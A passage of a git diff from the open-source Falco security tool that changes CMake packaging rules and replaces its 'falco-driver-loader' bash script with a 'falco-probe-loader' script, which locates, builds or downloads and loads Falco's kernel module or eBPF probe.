 file(COPY "${PROJECT_SOURCE_DIR}/scripts/debian/falco"
 	DESTINATION "${PROJECT_BINARY_DIR}/scripts/debian")
 
-configure_file(rpm/postinstall.in rpm/postinstall)
-configure_file(rpm/postuninstall.in rpm/postuninstall)
-configure_file(rpm/preuninstall.in rpm/preuninstall)
-
 file(COPY "${PROJECT_SOURCE_DIR}/scripts/rpm/falco"
 	DESTINATION "${PROJECT_BINARY_DIR}/scripts/rpm")
 
-configure_file(falco-driver-loader falco-driver-loader @ONLY)
-
 if(CMAKE_SYSTEM_NAME MATCHES "Linux")
-	install(PROGRAMS ${PROJECT_BINARY_DIR}/scripts/falco-driver-loader
+	install(PROGRAMS ${PROJECT_SOURCE_DIR}/scripts/falco-probe-loader
 		DESTINATION ${FALCO_BIN_DIR})
 endif()

scripts/debian/falco

@@ -1,6 +1,6 @@
 #! /bin/sh
 #
-# Copyright (C) 2020 The Falco Authors.
+# Copyright (C) 2019 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -26,7 +26,7 @@
 #                    driven by system calls with support for containers.
 ### END INIT INFO
 
-# Author: The Falco Authors <cncf-falco-dev@lists.cncf.io>
+# Author: The Falco Authors <opensource@sysdig.com>
 
 # Do NOT "set -e"
 

scripts/debian/postinst.in

@@ -43,6 +43,6 @@ case "$1" in
 esac
 
 if [ -x "/etc/init.d/$NAME" ]; then
-		update-rc.d $NAME defaults >/dev/null
+        update-rc.d $NAME defaults >/dev/null
 fi
 

scripts/falco-driver-loader

@@ -1,437 +0,0 @@
-#!/usr/bin/env bash
-#
-# Copyright (C) 2019 The Falco Authors.
-#
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-# Simple script that desperately tries to load the kernel instrumentation by
-# looking for it in a bunch of ways. Convenient when running falco inside
-# a container or in other weird environments.
-#
-
-#
-# Returns 1 if $cos_ver > $base_ver, 0 otherwise
-#
-cos_version_greater()
-{
-	if [[ $cos_ver == "${base_ver}" ]]; then
-		return 0
-	fi
-
-	#
-	# COS build numbers are in the format x.y.z
-	#
-	a=$(echo "${cos_ver}" | cut -d. -f1)
-	b=$(echo "${cos_ver}" | cut -d. -f2)
-	c=$(echo "${cos_ver}" | cut -d. -f3)
-
-	d=$(echo "${base_ver}" | cut -d. -f1)
-	e=$(echo "${base_ver}" | cut -d. -f2)
-	f=$(echo "${base_ver}" | cut -d. -f3)
-
-	# Test the first component
-	if [[ $a -gt $d ]]; then
-		return 1
-	elif [[ $d -gt $a ]]; then
-		return 0
-	fi
-
-	# Test the second component
-	if [[ $b -gt $e ]]; then
-		return 1
-	elif [[ $e -gt $b ]]; then
-		return 0
-	fi
-
-	# Test the third component
-	if [[ $c -gt $f ]]; then
-		return 1
-	elif [[ $f -gt $c ]]; then
-		return 0
-	fi
-
-	# If we get here, probably malformatted version string?
-
-	return 0
-}
-
-get_kernel_config() {
-	if [ -f /proc/config.gz ]; then
-		echo "Found kernel config at /proc/config.gz"
-		KERNEL_CONFIG_PATH=/proc/config.gz
-	elif [ -f "/boot/config-${KERNEL_RELEASE}" ]; then
-		echo "Found kernel config at /boot/config-${KERNEL_RELEASE}"
-		KERNEL_CONFIG_PATH=/boot/config-${KERNEL_RELEASE}
-	elif [ -n "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/boot/config-${KERNEL_RELEASE}" ]; then
-		echo "Found kernel config at ${HOST_ROOT}/boot/config-${KERNEL_RELEASE}"
-		KERNEL_CONFIG_PATH="${HOST_ROOT}/boot/config-${KERNEL_RELEASE}"
-	elif [ -f "/usr/lib/ostree-boot/config-${KERNEL_RELEASE}" ]; then
-		echo "Found kernel config at /usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
-		KERNEL_CONFIG_PATH="/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
-	elif [ -n "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}" ]; then
-		echo "Found kernel config at ${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
-		KERNEL_CONFIG_PATH="${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
-	elif [ -f "/lib/modules/${KERNEL_RELEASE}/config" ]; then
-		# this code works both for native host and agent container assuming that
-		# Dockerfile sets up the desired symlink /lib/modules -> $HOST_ROOT/lib/modules
-		echo "Found kernel config at /lib/modules/${KERNEL_RELEASE}/config"
-		KERNEL_CONFIG_PATH="/lib/modules/${KERNEL_RELEASE}/config"
-	fi
-
-	if [ -z "${KERNEL_CONFIG_PATH}" ]; then
-		echo "Cannot find kernel config"
-		exit 1
-	fi
-
-	if [[ "${KERNEL_CONFIG_PATH}" == *.gz ]]; then
-		HASH=$(zcat "${KERNEL_CONFIG_PATH}" | md5sum - | cut -d' ' -f1)
-	else
-		HASH=$(md5sum "${KERNEL_CONFIG_PATH}" | cut -d' ' -f1)
-	fi
-}
-
-get_target_id() {
-	if [ -f "${HOST_ROOT}/etc/os-release" ]; then
-		# freedesktop.org and systemd
-		# shellcheck source=/dev/null
-		source "${HOST_ROOT}/etc/os-release"
-		OS_ID=$ID
-	elif [ -f "${HOST_ROOT}/etc/debian_version" ]; then
-		# Older Debian
-		# fixme > can this happen on older Ubuntu?
-		OS_ID=debian
-	elif [ -f "${HOST_ROOT}/etc/centos-release" ]; then
-		# Older CentOS
-		OS_ID=centos
-	else
-		>&2 echo "Detected an unsupported target system, please get in touch with the Falco community"
-		exit 1
-	fi
-
-	case "${OS_ID}" in
-	("amzn")
-		if [[ $VERSION_ID == "2" ]]; then
-			TARGET_ID="amazonlinux2"
-		else
-			TARGET_ID="amazonlinux"
-		fi
-		;;
-	("ubuntu")
-		if [[ $KERNEL_RELEASE == *"aws"* ]]; then
-			TARGET_ID="ubuntu-aws"
-		else
-			TARGET_ID="ubuntu"
-		fi
-		;;
-	(*)
-		TARGET_ID=$(echo "${OS_ID}" | tr '[:upper:]' '[:lower:]')
-		;;
-	esac
-}
-
-load_kernel_module() {
-	if ! hash lsmod > /dev/null 2>&1; then
-		>&2 echo "This program requires lsmod"
-		exit 1
-	fi
-
-	if ! hash modprobe > /dev/null 2>&1; then
-		>&2 echo "This program requires modprobe"
-		exit 1
-	fi
-
-	if ! hash rmmod > /dev/null 2>&1; then
-		>&2 echo "This program requires rmmod"
-		exit 1
-	fi
-
-	echo "* Unloading ${DRIVER_NAME} module, if present"
-	rmmod "${DRIVER_NAME}" 2>/dev/null
-	WAIT_TIME=0
-	KMOD_NAME=$(echo "${DRIVER_NAME}" | tr "-" "_")
-	while lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1 && [ $WAIT_TIME -lt "${MAX_RMMOD_WAIT}" ]; do
-		if rmmod "${DRIVER_NAME}" 2>/dev/null; then
-			echo "* Unloading ${DRIVER_NAME} module succeeded after ${WAIT_TIME}s"
-			break
-		fi
-		((++WAIT_TIME))
-		if (( WAIT_TIME % 5 == 0 )); then
-			echo "* ${DRIVER_NAME} module still loaded, waited ${WAIT_TIME}s (max wait ${MAX_RMMOD_WAIT}s)"
-		fi
-		sleep 1
-	done
-
-	if lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1; then
-		echo "* ${DRIVER_NAME} module seems to still be loaded, hoping the best"
-		exit 0
-	fi
-
-	# skip dkms on UEK hosts because it will always fail`
-	if [[ $(uname -r) == *uek* ]]; then
-		echo "* Skipping dkms install for UEK host"
-	else
-		if hash dkms &>/dev/null && dkms install -m "${DRIVER_NAME}" -v "${DRIVER_VERSION}" -k "${KERNEL_RELEASE}" 2>/dev/null; then
-			echo "* Trying to load a dkms ${DRIVER_NAME} module, if present"
-
-			if insmod "/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${DRIVER_NAME}.ko" > /dev/null 2>&1; then
-				echo "${DRIVER_NAME} module found and loaded in dkms"
-				exit 0
-			elif insmod "/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${DRIVER_NAME}.ko.xz" > /dev/null 2>&1; then
-				echo "${DRIVER_NAME} module found and loaded in dkms (xz)"
-				exit 0
-			else
-				echo "* Unable to insmod"
-			fi
-		else
-			DKMS_LOG="/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/build/make.log"
-			if [ -f "${DKMS_LOG}" ]; then
-				echo "* Running dkms build failed, dumping ${DKMS_LOG}"
-				cat "${DKMS_LOG}"
-			else
-				echo "* Running dkms build failed, couldn't find ${DKMS_LOG}"
-			fi
-		fi
-	fi
-
-	echo "* Trying to load a system ${DRIVER_NAME} driver, if present"
-
-	if modprobe "${DRIVER_NAME}" > /dev/null 2>&1; then
-		echo "${DRIVER_NAME} module found and loaded with modprobe"
-		exit 0
-	fi
-
-	echo "* Trying to find a prebuilt ${DRIVER_NAME} module for kernel ${KERNEL_RELEASE}"
-
-	get_target_id
-
-	local FALCO_KERNEL_MODULE_FILENAME="${DRIVER_NAME}_${TARGET_ID}_${KERNEL_RELEASE}_${KERNEL_VERSION}.ko"
-
-	if [ -f "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}" ]; then
-		echo "Found a prebuilt module at ${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}, loading it"
-		insmod "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}"
-		exit $?
-	fi
-
-	local URL
-	URL=$(echo "${DRIVERS_REPO}/${DRIVER_VERSION}/${FALCO_KERNEL_MODULE_FILENAME}" | sed s/+/%2B/g)
-
-	echo "* Trying to download prebuilt module from ${URL}"
-	if curl -L --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" -o "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}" "${URL}"; then
-		echo "Download succeeded, loading module"
-		insmod "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}"
-		exit $?
-	else
-		>&2 echo "Download failed, consider compiling your own ${DRIVER_NAME} module and loading it or getting in touch with the Falco community"
-		exit 1
-	fi
-}
-
-load_bpf_probe() {
-	echo "* Mounting debugfs"
-
-	if [ ! -d /sys/kernel/debug/tracing ]; then
-		mount -t debugfs nodev /sys/kernel/debug
-	fi
-
-	get_kernel_config
-
-	if [ -n "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/etc/os-release" ]; then
-		# shellcheck source=/dev/null
-		source "${HOST_ROOT}/etc/os-release"
-
-		if [ "${ID}" == "cos" ]; then
-			COS=1
-		fi
-	fi
-
-	if [ -n "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/etc/VERSION" ]; then
-		MINIKUBE=1
-		MINIKUBE_VERSION="$(cat "${HOST_ROOT}/etc/VERSION")"
-	fi
-
-	get_target_id
-
-	local BPF_PROBE_FILENAME="${DRIVER_NAME}_${TARGET_ID}_${KERNEL_RELEASE}_${KERNEL_VERSION}.o"
-
-	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
-
-		local BPF_KERNEL_SOURCES_URL=""
-		local STRIP_COMPONENTS=1
-
-		customize_kernel_build() {
-			if [ -n "${KERNEL_EXTRA_VERSION}" ]; then
-			sed -i "s/LOCALVERSION=\"\"/LOCALVERSION=\"${KERNEL_EXTRA_VERSION}\"/" .config
-			fi
-			make olddefconfig > /dev/null
-			make modules_prepare > /dev/null
-		}
-
-		if [ -n "${COS}" ]; then
-			echo "* COS detected (build ${BUILD_ID}), using cos kernel headers..."
-
-			BPF_KERNEL_SOURCES_URL="https://storage.googleapis.com/cos-tools/${BUILD_ID}/kernel-headers.tgz"
-			KERNEL_EXTRA_VERSION="+"
-			STRIP_COMPONENTS=0
-
-			customize_kernel_build() {
-				pushd usr/src/* > /dev/null || exit
-
-				# Note: this overrides the KERNELDIR set while untarring the tarball
-				KERNELDIR=$(pwd)
-				export KERNELDIR
-
-				sed -i '/^#define randomized_struct_fields_start	struct {$/d' include/linux/compiler-clang.h
-				sed -i '/^#define randomized_struct_fields_end	};$/d' include/linux/compiler-clang.h
-
-				popd > /dev/null || exit
-
-				# Might need to configure our own sources depending on COS version
-				cos_ver=${BUILD_ID}
-				base_ver=11553.0.0
-
-				cos_version_greater
-				greater_ret=$?
-
-				if [[ greater_ret -eq 1 ]]; then
-				export KBUILD_EXTRA_CPPFLAGS=-DCOS_73_WORKAROUND
-				fi
-			}
-		fi
-
-		if [ -n "${MINIKUBE}" ]; then
-			echo "* Minikube detected (${MINIKUBE_VERSION}), using linux kernel sources for minikube kernel"
-			local kernel_version
-			kernel_version=$(uname -r)
-			local -r kernel_version_major=$(echo "${kernel_version}" | cut -d. -f1)
-			local -r kernel_version_minor=$(echo "${kernel_version}" | cut -d. -f2)
-			local -r kernel_version_patch=$(echo "${kernel_version}" | cut -d. -f3)
-
-			if [ "${kernel_version_patch}" == "0" ]; then
-				kernel_version="${kernel_version_major}.${kernel_version_minor}"
-			fi
-
-			BPF_KERNEL_SOURCES_URL="http://mirrors.edge.kernel.org/pub/linux/kernel/v${kernel_version_major}.x/linux-${kernel_version}.tar.gz"
-		fi
-
-		if [ -n "${BPF_USE_LOCAL_KERNEL_SOURCES}" ]; then
-			local -r kernel_version_major=$(uname -r | cut -d. -f1)
-			local -r kernel_version=$(uname -r | cut -d- -f1)
-			KERNEL_EXTRA_VERSION="-$(uname -r | cut -d- -f2)"
-
-			echo "* Using downloaded kernel sources for kernel version ${kernel_version}..."
-
-			BPF_KERNEL_SOURCES_URL="http://mirrors.edge.kernel.org/pub/linux/kernel/v${kernel_version_major}.x/linux-${kernel_version}.tar.gz"
-		fi
-
-		if [ -n "${BPF_KERNEL_SOURCES_URL}" ]; then
-			echo "* Downloading ${BPF_KERNEL_SOURCES_URL}"
-
-			mkdir -p /tmp/kernel
-			cd /tmp/kernel || exit
-			cd "$(mktemp -d -p /tmp/kernel)" || exit
-			if ! curl -L -o kernel-sources.tgz --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" "${BPF_KERNEL_SOURCES_URL}"; then
-				exit 1;
-			fi
-
-			echo "* Extracting kernel sources"
-
-			mkdir kernel-sources && tar xf kernel-sources.tgz -C kernel-sources --strip-components "${STRIP_COMPONENTS}"
-
-			cd kernel-sources || exit
-			KERNELDIR=$(pwd)
-			export KERNELDIR
-
-			if [[ "${KERNEL_CONFIG_PATH}" == *.gz ]]; then
-				zcat "${KERNEL_CONFIG_PATH}" > .config
-			else
-				cat "${KERNEL_CONFIG_PATH}" > .config
-			fi
-
-			echo "* Configuring kernel"
-			customize_kernel_build
-		fi
-
-		echo "* Trying to compile the eBPF probe (${BPF_PROBE_FILENAME})"
-
-		make -C "/usr/src/${DRIVER_NAME}-${DRIVER_VERSION}/bpf" > /dev/null
-
-		mkdir -p "${HOME}/.falco"
-		mv "/usr/src/${DRIVER_NAME}-${DRIVER_VERSION}/bpf/probe.o" "${HOME}/.falco/${BPF_PROBE_FILENAME}"
-
-		if [ -n "${BPF_KERNEL_SOURCES_URL}" ]; then
-			rm -r /tmp/kernel
-		fi
-	fi
-
-	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
-		local URL
-		URL=$(echo "${DRIVERS_REPO}/${DRIVER_VERSION}/${BPF_PROBE_FILENAME}" | sed s/+/%2B/g)
-
-		echo "* Trying to download a prebuilt eBPF probe from ${URL}"
-
-		curl -L --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" -o "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${URL}"
-	fi
-
-	if [ -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
-		if [ ! -f /proc/sys/net/core/bpf_jit_enable ]; then
-			echo "******************************************************************"
-			echo "** BPF doesn't have JIT enabled, performance might be degraded. **"
-			echo "** Please ensure to run on a kernel with CONFIG_BPF_JIT on.     **"
-			echo "******************************************************************"
-		fi
-
-		echo "* eBPF probe located, it's now possible to start Falco"
-
-		ln -sf "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${HOME}/.falco/${DRIVER_NAME}-bpf.o"
-		exit $?
-	else
-		echo "* Failure to find an eBPF probe"
-		exit 1
-	fi
-}
-
-ARCH=$(uname -m)
-KERNEL_RELEASE=$(uname -r)
-KERNEL_VERSION=$(uname -v | sed 's/#\([[:digit:]]\+\).*/\1/')
-DRIVERS_REPO=${DRIVERS_REPO:-"@DRIVERS_REPO@"}
-if [ -n "$DRIVER_INSECURE_DOWNLOAD" ]
-then
-	FALCO_DRIVER_CURL_OPTIONS=-fsSk
-else
-	FALCO_DRIVER_CURL_OPTIONS=-fsS
-fi
-
-MAX_RMMOD_WAIT=60
-if [[ $# -ge 1 ]]; then
-	MAX_RMMOD_WAIT=$1
-fi
-
-DRIVER_VERSION="@PROBE_VERSION@"
-DRIVER_NAME="@PROBE_NAME@"
-
-if [ "$(id -u)" != 0 ]; then
-	echo "Installer must be run as root (or with sudo)."
-	exit 1
-fi
-
-if ! hash curl > /dev/null 2>&1; then
-	echo "This program requires curl"
-	exit 1
-fi
-
-if [ -v FALCO_BPF_PROBE ] || [ "${1}" = "bpf" ]; then
-	load_bpf_probe
-else
-	load_kernel_module
-fi

scripts/falco-probe-loader

@@ -0,0 +1,409 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Simple script that desperately tries to load the kernel instrumentation by
+# looking for it in a bunch of ways. Convenient when running falco inside
+# a container or in other weird environments.
+#
+
+#
+# Returns 1 if $cos_ver > $base_ver, 0 otherwise
+#
+cos_version_greater()
+{
+	if [[ $cos_ver == $base_ver ]]; then
+		return 0
+	fi
+
+	#
+	# COS build numbers are in the format x.y.z
+	#
+	a=`echo $cos_ver | cut -d. -f1`
+	b=`echo $cos_ver | cut -d. -f2`
+	c=`echo $cos_ver | cut -d. -f3`
+
+	d=`echo $base_ver | cut -d. -f1`
+	e=`echo $base_ver | cut -d. -f2`
+	f=`echo $base_ver | cut -d. -f3`
+
+	# Test the first component
+	if [[ $a -gt $d ]]; then
+		return 1
+	elif [[ $d -gt $a ]]; then
+		return 0
+	fi
+
+	# Test the second component
+	if [[ $b -gt $e ]]; then
+		return 1
+	elif [[ $e -gt $b ]]; then
+		return 0
+	fi
+
+	# Test the third component
+	if [[ $c -gt $f ]]; then
+		return 1
+	elif [[ $f -gt $c ]]; then
+		return 0
+	fi
+
+	# If we get here, probably malformatted version string?
+
+	return 0
+}
+
+
+get_kernel_config() {
+	if [ -f /proc/config.gz ]; then
+		echo "Found kernel config at /proc/config.gz"
+		KERNEL_CONFIG_PATH=/proc/config.gz
+	elif [ -f "/boot/config-${KERNEL_RELEASE}" ]; then
+		echo "Found kernel config at /boot/config-${KERNEL_RELEASE}"
+		KERNEL_CONFIG_PATH=/boot/config-${KERNEL_RELEASE}
+	elif [ ! -z "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/boot/config-${KERNEL_RELEASE}" ]; then
+		echo "Found kernel config at ${HOST_ROOT}/boot/config-${KERNEL_RELEASE}"
+		KERNEL_CONFIG_PATH="${HOST_ROOT}/boot/config-${KERNEL_RELEASE}"
+	elif [ -f "/usr/lib/ostree-boot/config-${KERNEL_RELEASE}" ]; then
+		echo "Found kernel config at /usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
+		KERNEL_CONFIG_PATH="/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
+	elif [ ! -z "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}" ]; then
+		echo "Found kernel config at ${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
+		KERNEL_CONFIG_PATH="${HOST_ROOT}/usr/lib/ostree-boot/config-${KERNEL_RELEASE}"
+	elif [ -f /lib/modules/${KERNEL_RELEASE}/config ]; then
+		# this code works both for native host and agent container assuming that
+		# Dockerfile sets up the desired symlink /lib/modules -> $HOST_ROOT/lib/modules
+		echo "Found kernel config at /lib/modules/${KERNEL_RELEASE}/config"
+		KERNEL_CONFIG_PATH="/lib/modules/${KERNEL_RELEASE}/config"
+	fi
+
+	if [ -z "${KERNEL_CONFIG_PATH}" ]; then
+		echo "Cannot find kernel config"
+		exit 1
+	fi
+
+	if [[ "${KERNEL_CONFIG_PATH}" == *.gz ]]; then
+	    HASH=$(zcat "${KERNEL_CONFIG_PATH}" | md5sum - | cut -d' ' -f1)
+	else
+	    HASH=$(md5sum "${KERNEL_CONFIG_PATH}" | cut -d' ' -f1)
+	fi
+}
+
+load_kernel_probe() {
+	if ! hash lsmod > /dev/null 2>&1; then
+		echo "This program requires lsmod"
+		exit 1
+	fi
+
+	if ! hash modprobe > /dev/null 2>&1; then
+		echo "This program requires modprobe"
+		exit 1
+	fi
+
+	if ! hash rmmod > /dev/null 2>&1; then
+		echo "This program requires rmmod"
+		exit 1
+	fi
+
+	echo "* Unloading ${PROBE_NAME}, if present"
+	rmmod "${PROBE_NAME}" 2>/dev/null
+	WAIT_TIME=0
+	KMOD_NAME=$(echo "${PROBE_NAME}" | tr "-" "_")
+	while lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1 && [ $WAIT_TIME -lt $MAX_RMMOD_WAIT ]; do
+		if rmmod "${PROBE_NAME}" 2>/dev/null; then
+			echo "* Unloading ${PROBE_NAME} succeeded after ${WAIT_TIME}s"
+			break
+		fi
+		((++WAIT_TIME))
+		if (( $WAIT_TIME % 5 == 0 )); then
+			echo "* ${PROBE_NAME} still loaded, waited ${WAIT_TIME}s (max wait ${MAX_RMMOD_WAIT}s)"
+		fi
+		sleep 1
+	done
+
+	if lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1; then
+		echo "* ${PROBE_NAME} seems to still be loaded, hoping the best"
+		exit 0
+	fi
+
+	# skip dkms on UEK hosts because it will always fail
+	if [[ $(uname -r) == *uek* ]]; then
+		echo "* Skipping dkms install for UEK host"
+	else
+		echo "* Running dkms install for ${PACKAGE_NAME}"
+		if dkms install -m "${PACKAGE_NAME}" -v "${FALCO_VERSION}" -k "${KERNEL_RELEASE}"; then
+			echo "* Trying to load a dkms ${PROBE_NAME}, if present"
+
+			if insmod "/var/lib/dkms/${PACKAGE_NAME}/${FALCO_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${PROBE_NAME}.ko" > /dev/null 2>&1; then
+				echo "${PROBE_NAME} found and loaded in dkms"
+				exit 0
+			elif insmod "/var/lib/dkms/${PACKAGE_NAME}/${FALCO_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${PROBE_NAME}.ko.xz" > /dev/null 2>&1; then
+				echo "${PROBE_NAME} found and loaded in dkms (xz)"
+				exit 0
+			else
+				echo "* Unable to insmod"
+			fi
+		else
+			DKMS_LOG="/var/lib/dkms/${PACKAGE_NAME}/${FALCO_VERSION}/build/make.log"
+			if [ -f "${DKMS_LOG}" ]; then
+				echo "* Running dkms build failed, dumping ${DKMS_LOG}"
+				cat "${DKMS_LOG}"
+			else
+				echo "* Running dkms build failed, couldn't find ${DKMS_LOG}"
+			fi
+		fi
+	fi
+
+	echo "* Trying to load a system ${PROBE_NAME}, if present"
+
+	if modprobe "${PROBE_NAME}" > /dev/null 2>&1; then
+		echo "${PROBE_NAME} found and loaded with modprobe"
+		exit 0
+	fi
+
+	echo "* Trying to find precompiled ${PROBE_NAME} for ${KERNEL_RELEASE}"
+
+	get_kernel_config
+
+	local FALCO_PROBE_FILENAME="${PROBE_NAME}-${FALCO_VERSION}-${ARCH}-${KERNEL_RELEASE}-${HASH}.ko"
+
+	if [ -f "${HOME}/.falco/${FALCO_PROBE_FILENAME}" ]; then
+		echo "Found precompiled module at ~/.falco/${FALCO_PROBE_FILENAME}, loading module"
+		insmod "${HOME}/.falco/${FALCO_PROBE_FILENAME}"
+		exit $?
+	fi
+
+	local URL
+	URL=$(echo "${PROBE_URL}/${PACKAGES_REPOSITORY}/sysdig-probe-binaries/${FALCO_PROBE_FILENAME}" | sed s/+/%2B/g)
+
+	echo "* Trying to download precompiled module from ${URL}"
+	if curl --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" -o "${HOME}/.falco/${FALCO_PROBE_FILENAME}" "${URL}"; then
+		echo "Download succeeded, loading module"
+		insmod "${HOME}/.falco/${FALCO_PROBE_FILENAME}"
+		exit $?
+	else
+		echo "Download failed, consider compiling your own ${PROBE_NAME} and loading it or getting in touch with the Falco community"
+		exit 1
+	fi
+}
+
+load_bpf_probe() {
+	echo "* Mounting debugfs"
+
+	if [ ! -d /sys/kernel/debug/tracing ]; then
+		mount -t debugfs nodev /sys/kernel/debug
+	fi
+
+	get_kernel_config
+
+	if [ ! -z "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/etc/os-release" ]; then
+		. "${HOST_ROOT}/etc/os-release"
+
+		if [ "${ID}" == "cos" ]; then
+			COS=1
+		fi
+	fi
+
+	if [ ! -z "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/etc/VERSION" ]; then
+		MINIKUBE=1
+		MINIKUBE_VERSION="$(cat ${HOST_ROOT}/etc/VERSION)"
+	fi
+
+	local BPF_PROBE_FILENAME="${BPF_PROBE_NAME}-${FALCO_VERSION}-${ARCH}-${KERNEL_RELEASE}-${HASH}.o"
+
+	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
+
+	        local BPF_KERNEL_SOURCES_URL=""
+		local STRIP_COMPONENTS=1
+
+	        customize_kernel_build() {
+		    if [ -n "${KERNEL_EXTRA_VERSION}" ]; then
+			sed -i "s/LOCALVERSION=\"\"/LOCALVERSION=\"${KERNEL_EXTRA_VERSION}\"/" .config
+		    fi
+		    make olddefconfig > /dev/null
+		    make modules_prepare > /dev/null
+		}
+
+		if [ -n "${COS}" ]; then
+			echo "* COS detected (build ${BUILD_ID}), using cos kernel headers..."
+
+			BPF_KERNEL_SOURCES_URL="https://storage.googleapis.com/cos-tools/${BUILD_ID}/kernel-headers.tgz"
+			KERNEL_EXTRA_VERSION="+"
+			STRIP_COMPONENTS=0
+
+			customize_kernel_build() {
+			    pushd usr/src/* > /dev/null
+
+			    # Note: this overrides the KERNELDIR set while untarring the tarball
+			    export KERNELDIR=`pwd`
+
+			    sed -i '/^#define randomized_struct_fields_start	struct {$/d' include/linux/compiler-clang.h
+			    sed -i '/^#define randomized_struct_fields_end	};$/d' include/linux/compiler-clang.h
+
+			    popd > /dev/null
+
+			    # Might need to configure our own sources depending on COS version
+			    cos_ver=${BUILD_ID}
+			    base_ver=11553.0.0
+
+			    cos_version_greater
+			    greater_ret=$?
+
+			    if [[ greater_ret -eq 1 ]]; then
+				export KBUILD_EXTRA_CPPFLAGS=-DCOS_73_WORKAROUND
+			    fi
+                        }
+		fi
+
+		if [ -n "${MINIKUBE}" ]; then
+			echo "* Minikube detected (${MINIKUBE_VERSION}), using linux kernel sources for minikube kernel"
+			local kernel_version=$(uname -r)
+			local -r kernel_version_major=$(echo ${kernel_version} | cut -d. -f1)
+			local -r kernel_version_minor=$(echo ${kernel_version} | cut -d. -f2)
+			local -r kernel_version_patch=$(echo ${kernel_version} | cut -d. -f3)
+
+			if [ "${kernel_version_patch}" == "0" ]; then
+				kernel_version="${kernel_version_major}.${kernel_version_minor}"
+			fi
+
+			BPF_KERNEL_SOURCES_URL="http://mirrors.edge.kernel.org/pub/linux/kernel/v${kernel_version_major}.x/linux-${kernel_version}.tar.gz"
+		fi
+
+		if [ -n "${BPF_USE_LOCAL_KERNEL_SOURCES}" ]; then
+		        local -r kernel_version_major=$(uname -r | cut -d. -f1)
+			local -r kernel_version=$(uname -r | cut -d- -f1)
+			KERNEL_EXTRA_VERSION="-$(uname -r | cut -d- -f2)"
+
+			echo "* Using downloaded kernel sources for kernel version ${kernel_version}..."
+
+			BPF_KERNEL_SOURCES_URL="http://mirrors.edge.kernel.org/pub/linux/kernel/v${kernel_version_major}.x/linux-${kernel_version}.tar.gz"
+		fi
+
+		if [ -n "${BPF_KERNEL_SOURCES_URL}" ]; then
+			echo "* Downloading ${BPF_KERNEL_SOURCES_URL}"
+
+			mkdir -p /tmp/kernel
+			cd /tmp/kernel
+			cd `mktemp -d -p /tmp/kernel`
+			if ! curl -o kernel-sources.tgz --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" "${BPF_KERNEL_SOURCES_URL}"; then
+				exit 1;
+			fi
+
+			echo "* Extracting kernel sources"
+
+			mkdir kernel-sources && tar xf kernel-sources.tgz -C kernel-sources --strip-components "${STRIP_COMPONENTS}"
+
+			cd kernel-sources
+			export KERNELDIR=`pwd`
+
+			if [[ "${KERNEL_CONFIG_PATH}" == *.gz ]]; then
+			    zcat "${KERNEL_CONFIG_PATH}" > .config
+			else
+			    cat "${KERNEL_CONFIG_PATH}" > .config
+			fi
+
+			echo "* Configuring kernel"
+			customize_kernel_build
+		fi
+
+		echo "* Trying to compile BPF probe ${BPF_PROBE_NAME} (${BPF_PROBE_FILENAME})"
+
